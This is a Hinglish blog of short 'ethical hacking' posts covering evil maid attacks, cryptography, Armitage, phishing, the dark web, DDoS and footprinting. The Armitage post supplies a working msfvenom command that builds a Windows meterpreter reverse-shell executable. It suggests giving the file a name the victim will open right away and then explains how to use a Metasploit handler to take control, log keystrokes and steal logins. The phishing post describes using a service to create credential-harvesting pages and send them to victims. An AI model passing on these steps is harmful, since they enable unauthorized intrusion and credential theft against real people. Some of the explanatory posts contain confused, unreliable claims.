BANNER

Friday, 26 January 2018

What is evil maid attack? "Evil Maid" Attacks on Encrypted Hard Drives


What Is Evil Maid Attack?


"Evil Maid" Attacks on Encrypted Hard Drives 

Hello, dosto.
Aaj hum baat krne wale hai EVIL MAID ATTACK ke bare me, evil maid attack kya hota hai. 


yeh kaise work karta hai.
Toh subse phle yeh ki evil maid attack ek physical attack hai. aap evil maid attack virtually ya online attack karna chaen toh yeh attack nhi kiya ja sakta hai.
Agar aapke system pr koi evil maid attack karna chahe toh usse aapke ghr ya office aakar krna hoga. ya uh kahe toh usse aapki system ko ek bar use krna hoga, toh yeh attack karne se kya fyda hota hai.  Chaliye aap man lijiye ki aap ke system pr koi evil maid attack kiya hai. toh kya hota hai is attack me attacker ke pas aapke system ka pura control chla jayge. 
aap jo jo apne system pr karenge woh sab dekh sakta hai. Itna hi nhi ki woh aap ke system ko dur se hi bethe chla bhi sakta hai. aapke system ko shutdown bhi kar sakta  hai.

Agr aap isko rokne ki kosis bhi karna chahenge koi antivirus use kar ke, tab bhi nhi kar sakte because woh aap ke system ko control kar rha hai.
Toh isme kya hota hai bhot sare professional hacker hote hai us ke pas pendrive ya hard disk hota hai, or woh apne pendrive me aysi service load kar ke rakhta hai. ki jaysi woh pendrive aapke system pr lagata hai, sara ka sara data copy hone lagta hai. 
Jaisye man lijiye aap koi company run kar rhe hai or aap ke pas aapke laptop on kar ke chale gye hai. Or attacker aapka employ ban kar Evil maid attack kar rha hai toh aapke sara data uske pas chla jata hai.
  
  1. what is ddoos attack
  2. how to hack facebook using phishing attack.
  3. how to hack any system and get full control using armitage tool 
  4. how to fine loophole in your victim system

Toh aap soch rhe honge ki  isme attack krne ki kya jarurat hai. jab attacker ko sab kuch mil rha hai. toh isme kya hota hai ki agar aap kisi system se normally data copy karna chahe to bhot time lg jata hai.

 
Whi Evil maid attack jo aapke pendrive me hai use copy kar dijiye or install kar dijiye isme jyda time nhi lgta. or evil maid attack se system ka data hi nhi uska full control bhi aapke pas aa jayega.
Toh isse bachne ka bhi tarika hai dosto bhot sare ayse software hai dost jisse ki aapke alawa koi aapke system use karne ki kosis karta hai toh aapke cellphone me ya other system pr notification chla jata hai. or aap apne system ko off kr sakte ho. 

Like My facebook Page

https://www.facebook.com/CeH.kunalsahani/

 


Sunday, 7 January 2018

What is cryptography ? data security explain in hindi.

What is cryptography ?

 Data security explain in hindi


hello dosto
kaise ho aap.. aaj ka topic start krne se phle mera requset hai ki agr apne mera YouTube Channel subscribe nhi kiya hai toh kar le... because meri kosis hai ki me aap ko easy language me Ethical Hacking  ke bare me knowledge de saku...
Toh chaliye....  aaj hum jaanege ki cryptography kya hota hai to sabse phale baat karte hai cryptography ki.





what is Cryptography

cryptography ka agar hum definition ki baat kare to cryptography ka meaning hota hai “apne data ko secure karna”  means the art of protecting data.
 So dosto agar hum simple language me bole to iska matlab hai ki mera ek data hai usko mai change karke ek ase code me change kar duga jo ki kisi ko smz me na aaye mai jisko wo data send kar rha hu wo data usko hi smz me aayga kyonki main usko yaa to koi  hint duga ki isko ase samjna hai.
 but ye sab kaise hoga to sabse phale hum apne data ya jo bhi humare paas information hai usko unreadable (secrets code) me change kar dege jinko hum chiper text bhi kahte hai.
or wo person jiske paas is secret key hogi wo hi isse decrypt karke read karega decrypt hui data ko hum plain text kahte hai.









use of cryptography

cryptography ka use secret E-mail and messages  and credit card ,banking, etc information ko secure karne me kiya jata hai. because ye data ko security ke sath sath integrity bhi banaye rhkhta hai.
present time me cryptography ka use mathematics ki hard questions ko solve karne me bhi kiya jata hai.

types of cryptography  

 cryptography me  two process hoti hai
1.encryptions 
2.decryption

Encryption : me plain text ko cipher text me convert kiya jata hai.
mane uper aapko bataya hai ki plain and cipher text ky hota hai.
decryption :me isse ulat hota hai isme simply cipher text ko plain text me convert kiya jata hai data ko readable banane ke liye. 


 likes

Like kre mere facebook page ko ethical hacking course se related 
jankari ke liye....


AND
 Subscribe

Subscribe my YouTube Channel for Ethical hacking tools practical videos...

Sunday, 17 December 2017

Hacking with Armitage in Ethical hacking..

Hacking with Armitage

in

Ethical Hacking

Hello friend,
Ajj main baat krne wala hu Armitage ke bare mai... i hope aap ko armitage kr bare me pata hoga... agr nhi hai.. toh aap ko is post mai armitage ke bare me puri jankari bhot kam sabdo me achi trh se samajh aa jayega...
Toh chaliye baat krte hai.... Armitage ke bare mai....

1. what is Armitage ?

Armitage is a graphical user interface software... armitage ko command coding se aage le jakar GUI ka rup diya gya hai... taki isse hacking or aasan ho jaye...
armitage ko use karna bhot aasan hai or mere aane wale video me aap ko practical kre bhi dikhaunga... ki system and android hacking... armitage ke madad se kitna easy hai....

2. What's the benefit of Armitage.? 

Armitage se aap apne victim ke system pr full control paa sakte hai... aap uske sare data copy kr sakte hai... or aap apne victem ke system ke key bhi record kr sakte hai...
or to or apne victem ke pc ko live dekh sakte hai...
and uske system ko kill bhi kr sakte hai..


3.armitage ka use kaise krte hai..?

sabse phle aap ko victim ke system ko hack krne ke liye aap ko ek venom tyar krna hota hai... venom tyar krne ke baad aap ko apne bnaye hue service ko apne victim ke system me run krwana jaruri hai...
Agr ja tak victim ke system pr aap ki bnai hui service run nhi hui tab tak aap uske system pr control nhi kr sakte hai..

See more.
1. How to find someone ip in a minutes...
2.Learn about Phishing attack
3.What is DDoS attack
4.Learn about Footprinting...
5.What is deep web..? 

4. Venom kaise bnaye 

venom bnane ke liye aap ko bs ek codding krni hoti hai.... 
coding carne ke liye sabse phle command terminal open krni hogi.....
terminal open hone ke baad aap ko code likhna haii...
CODE:

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip(exq.192.168.0.1) lport=4444 -p exe -a x86 > aplicationname.exe

(application ka name aysa rkhiye taki aapka victim use turant open krle...)



ab venom tyar krne ke baad aap ka jo application create hua hai woh apko apke Root folder pr dikh jayega..

Ab apko new terminal open krna hai.. or terminal open hone pr yeh command deni hai....

/etc/init.d/postgresql start
(enter)
Armitage

yeh command type krne ke baad armitage open ho jayega....... 



armitage open hone ke baad aap simply search bar pr type kre handler and handler pr click kre click krne ke baad aapke samne ek window open hogi us window me apna lport jo aapne venom tyar krne samay feed kiya tha... or lhost type kr de.. type krne ke baad launch pr click kr de....





launch krne ke baad victim ke system pr pura control kr sakte hai aap chaye toh useke screen short le sakte ho ya live dekh sakte ho... or victim ki system ke pure data copy kr sakte ho... or victim ke system ke key bhi record kr sakte ho ki apka victim kya type kr rha hai keyboard pr... jiske madad se aap uske pure dinn me kya kya kon si website pr login ho rha hai.. or kitne der tk hai.. loing id or password pta kr sakte ho....


page linkyt



Like kre mere facebook page ko ethical hacking course se related 
jankari ke liye....
AND
Subscribe my YouTube Channel for Ethical hacking tools practical videos...

 





Sunday, 10 December 2017

How to hack Facebook using phishing attack

What is Phishing. 



Hello Friends,
 Apko pta hai Phishing Hacking Kya hota hai?. Agar apko Phishing Hacking ke bare me kuch pta hai to apke Liye acchi baat hai. But agar apko Phishing hacking ke bare me nahi pta hai. To aaj mai apko iske bare me Details me bataunga.
 Phishing Hacking ek aisi Hacking Technique hai. Jisme apko kisi bhi Software tool ya Virus Program ki Koi jarurt nahi hota  hai. Phishing hacking ke liye Bus apko thoda sa Programming ki Knowledge honi chahiye. 




What is phishing

Aap sabhi ne fishing ke baare me to suna hi hoga. Fishing me chaara daal kar machli(fish) ko pakda jata hai thk  usi tarha PHISHING hai. Bas isme antar itna hai ki fishing me chara daal ke machli ko pakda jata hai. Or PHISHING me chara daal kar insane ko loota jata hai. PHISHING poori tarha hacking se related hai.

Phishing attack kaise hota hai.....

Phishing Hacking 90% Unknown Link Open karne se Hota hai. Example ke taur par apke Computer ya Mobile par ek Mail aata hai. Jisper likha Hota hai ” Click to Below Link get 1GB 4G Data Free for 10 Days”. Jiase hi aap diye gaye link par click karte hai. To apke samne ek SignUp ka Page opne hoker aa jata. Jisme option hota hai Mobile Number, Gmail Id aur password.

Phishing Url kaise bnaye 

Phishing url bnane ke liye simply aap z shadow ka use kr sakte hai.... ise  aap normally use kr sakte hai first aap isme apna account create kr le and jaise hi aapne apna account create kr lete hai toh isme phle se hi Web page bne bnaye mill jate hai.. aap ko simply Url copy karna hota hai. or apne victim ko send kr dena hota hai jayise hi victim is page me login krta hai... automatically victim ki Id & Password aapke pas aa jata hai. or victim ko pta bhi nhi chlta.....    



Phishing scams kya hai


Ab baat karte hai ki phishing scams kya hai. Ye scams ek phishing attack hai ya dusre shabdo me kahu to aap ise email scams bhi keh sakte hai. Isme hota ye hai ki aapko ek email aata hai. Or aapko aaisa lagega ki vo email facebook,twitter etc. kisi company ki taraf se aaya hai. Kyuki jo us email ka layout ya design hota hai vo ek dum aaisa dikhta hai jaise ki vo ek trusted source se aaya hai. Or us mail me kuch aaisa likha hota hai ki usko dekhne ke baad aap majbur ho jate hai. 


Or  diye hue link ko khol dete hai or apni information ko daal dete hai. Toh dosto phle aap check kr le ki woh trusted site hai ya nhi...
Zydatar un mails me likha hota hai ki aapke account ki security compromise ho chuki hai. Ya fir humne aapki id me kuch galat activity notice ki hai pichle 48 ghanto me. Aaise hi reasons likhe hote hai or in sab ko dekh kar log galti se apni information share kar dete hai. Ye hacking koi naya nahi hai ye sab pichle kaafi samaye se chalta aa raha hai.

 FaceBook
Like kre mere facebook page ko ethical hacking course se related 
jankari ke liye....


Phishing attack se kaise bache

Isse bachne ke liye aapko kuch baato ka dhyan rakhna padega. Agar aapke pas bhi aaisa koi email aata hai to usme koi na koi link diya hoga to aap us link ko khole... kholne ke bad jb  window khulegi usme hare k cheez ki spelling ko dhyan se check kare. Link ko bhi dhyan se check kare. Kyuki agar vo koi scam mail hui to ye baat pakka hai ki usme spelling galat zarur hongi. Dusri baat aap apni id me 2 step verification ko hamesha on karke rakhe...


Friday, 8 December 2017

What is Dark Web

What is DEEP Web, Dark Web and Surface Web.


Hello Friends
 Ajj baat krenge Dark Web ke bare mai .Blue Whale aane ke baad Dark Internet , Dark Web ,Deep web Etc. Internet toh aap jante hoge aap Google , youtube ,Facebook , aise bahut se lakho website hai jisse sabhi log use karte hai Internet duniya ka special part ban gaya hai Internet ek Public Internet hai jisse Surface web bhi kahte hai but 95.5% Internet kaun use karta hai aur wo kaha hai.  chaliye batata hun Internet ko Access karne ke liye isse 3 part mai diya gaya hai.

1.Surface Web

2.Deep Web

3.Dark Web






Surface Web

Internet ke wo part hote hai jo Surface Web ko sabhi use karte hai es Webpage pe jane ke liye Search engine ka help le sakte hai ya esse dusre tarike se Surface Web ko Google Aur Bing Search engine Index karte hai jo Query search karta hai toh wo Result ke jaise dikhata hai aur jayade log inhi search engine ka use karke  Surface Web ki Website pe jate hai but aapko pata hai unh page ka jo Google AND Bing AS Search Engine Index nahi karte hai .




Deep Web

Deep Web wo hai jo aap kisi bank ki khate ki baare mai Internet pe Search karte hai jise aap kisi bhi Website ka Admin pannel dekh sakte hai ,  Email ko Google pe Search kar sakte hai ya Bloger ka Draft post Internet pe search kar sakte hai but iske liye aapko us page ke admin ki permission leni hogi jiske sath Access karne ke liye Password ka pata hona chahiye aap us jaankari ko Access kar payege ye Deep Web Internet ke sabhi Web page pe aate hai jisse search engine mai search nahi kar pate hai ye ligle hote hai Deep web ko Invisible Web ke name se jana jata hai jaise ismai jo page aate hai wo Draft page ,Blog Platform ,Academic AND copret data base , Government publication ,Email ,Directory ,Electronic Etc.


Dark Web


Deep Web AUR Dark Web ko ek hi mana jata tha but illegle ke wajah se isse two part mai kr diya gaya hai ye Dark Web AUR Deep Web ka pare hai but eska use Internet pe uske prakar ke illegle pe work karne ke liye karte hai Example – Durgs Kharidna ya sell karna , Danger se Danger Hatiyar kharidna ya sell karna , ATM Debit/Credit ki jaankari churakar kisi ko sell karna Etc. Dark Web pe itna easily se nahi ja sakta koi iske liye koi Different Browser ka use karte hai jisse aap (TOR) encryption tool se Dark Web page ko encrypt karte hai jisse site jhup jati hai aur search engine isse Index nahi kar paate ye only (Tor Browser)  pe hi dikhta hai.





Like kre mere facebook page ko ethical hacking course se related 
jankari ke liye....

 YouTube FaceBook Page


Wednesday, 6 December 2017

What is DdoS Attack....????

DdoS Attack kya hai.....

                                                                                                                                                                   

DdoS attack..

Hello Friends , 
Aaj Hum Baat Krege DDos Attack kya hai.??
DDos Attack Jiski full form hai – Distributed Denial Of Service.
Ddos Attack jis site pr bhi ho woh site down ho jati hai..
Under Attacking site sirf loading hoti rhti hai pr site open nhi hoti.
Ddos Attack ek bhut hi khatarnak attack hai.. agr khuda na vasta yeh attack apki site pr ho jaye toh bhut nuksaan hoga.. Main apko achi trh se explain krke btauga ki Ddos Attack kya hai.. aur yeh attack hota kese hai.. 

Ddos Attack uss website pr hota hai jiski bandwidth kam hoti hai..
Maan lijiye apki site pr ek second mei 200 bnde visit kr skte hai.. 200/s yeh apki site ki bandwidth hai..
Agr koi apki site mei 1 second mei 500 user visit krwade toh…..
Toh apki site down ho jayegi.. apki site tb tak open nhi hogi jb tak attacker apni traf se fake traffic bhejna bnd na krde..
Gbraye ni.. agr apki site pr attack ho gya hai toh sbse pehle ap apne hosting provider ko call kare aur unki help le.. ya ap mujhe bhi email karke bta skte hai
Ddos Attack mei ” Botnet ” se fake traffic bheji jaati hai site me..
” Apni Next Post mei apko Botnet ke baare mei btauga ”

Ddos Attack hota kese hai ?

Ddos Attack hacker kisi malware ya vulnerability ko email ya kisi link ke through apko send krte hai..
Jaise hi ap woh link ya email open krte hai toh hacker ko apki site ka remote access mil jata hai..
Aur woh apki site pr attack krleta hai..

Hackers aap ke website pr kyu attack krenge !
Dosto hacker ya toh site hack paiso ke liye krte hai ya revenge ke liye.
Agr apki site pr attack hua hai toh hacker apki site ke front page pr kuch likhr chod dega..
Woh apse paiso ki demand krega etc..

Agr ap hacker ko paise Doge toh tbhi hacker apki site pr attack krna bnd krega..
Site pr Ddos Attack se nuksaan ! 
Dosto Ddos Attack se bhut nuksaan hota hai. Maan lijiye apki site shopping ki hai.
Apki site pr har ek min mei order book  hote hai toh sociye apki site pr attack ho jaye toh apko kitna nuksaan hogaa….
Aur apki site ki Ranking down ho jayegi..
DDos Attack se koi bhi apki site baarbaad krdega..

Sochiye apne ek site pr bhot saal kaam kiya hai aur baad mei DDos Attack hojaye apko kitna bura lgega..


see more..
victim ke system me loophole kaise dekhe.....?
first step to attack victim's system.......
How to hack Facebook using phishing attack
Like kre mere facebook page ko ethical hacking course se related 
jankari ke liye....

 CeH

YouTube


DdoS Attack se kese bche..
* WordPress – agr ap WordPress user hai toh mai apko niche btaye gye steps follow krne hai :-
* WordPress App Update Krte Rhe.
* Koi Unknown Email Aur Link Na Kare.
* Wordfence Security Plugin Istemaal Kare.

* Blogger – agr ap blogger user hai toh apko ek baat btana chahuga ki blogger site pr Ddos Attack nhi hota.. yeh google host site hai.
Agr Apko High Protection Chahiye Toh Apko Mai Personally two best sites suggest kruga.. joh apko Ddos Attack se protect kregi..
Akamai
Yeh dono sites best Ddos Attack protecting sites hai.
Agr apko apni sites hmesha ke liye hackers attack se bchayi rkhni hai toh inn dono mei se kisibek sites se nata jod le
note:
Kbhi bhi kisi unknown link aur email ko open na kre..
ThankYou.......



Wednesday, 8 November 2017

What is footprinting ?

What is footprinting ? information gathering before an attack 
(in hindi)

Hello dosto, aaj main baat karunga footprinting ke bare me. Footprinting kya hota hai ? Iska relation kis se hai?
Chaliye jaise man lijiye ho hackers hote hai, jese koi website ya system hack karte hai, uske liye kya kya uska jnanna jaroori hai jis ke help se wo hack kr sakta hai... Toh footprinting se relation hackers se hai. jo ki system website hack karta hai, jisko hack krne k liye planing ki jati hai. hackers kisi bhi website ko hack karne ke liye fullproof planing karte hai. Hackers yeh kaam group bnakr bhi kar sakte hai. Jaise man lijiye website ke do control hai. or dono control alag alg jagha hai... is kaam ko dono alg alg jgh baithe hacker kr sakte hai... jaise ki hum jante hai ki yeh networking ke dwara hota hai toh isme hacker ko koi paresani nhi aati hai, website ko hack karne mai.




Footprinting ki parkriya me vicitm ke bare mai possible information ko ikhta karna hota hai. jaise vicitm ka name, number uska addres ect... aysi tamam jankari nikalni padti hai. jis se vicitm ke system ko kaise aasani se hack kiya ja sakta hai.  uske system ke kya weak points hai, kon kon se port open hai, uski kya ip hai... is jankari ko hacking karne se pahle ikhta krni hoti hai.. jise hum hacking ki language me Footprinting khate hai.......

so i hope dosto aap ko pta chl gya hoga ki footprinting kise khate hai... agr aap ko post pasand aaya ho.. to mere facebook page ko like karen taki aap ko ethical hacking sikh sake...
or mere Youtube channel ko subscribe krna na bhule..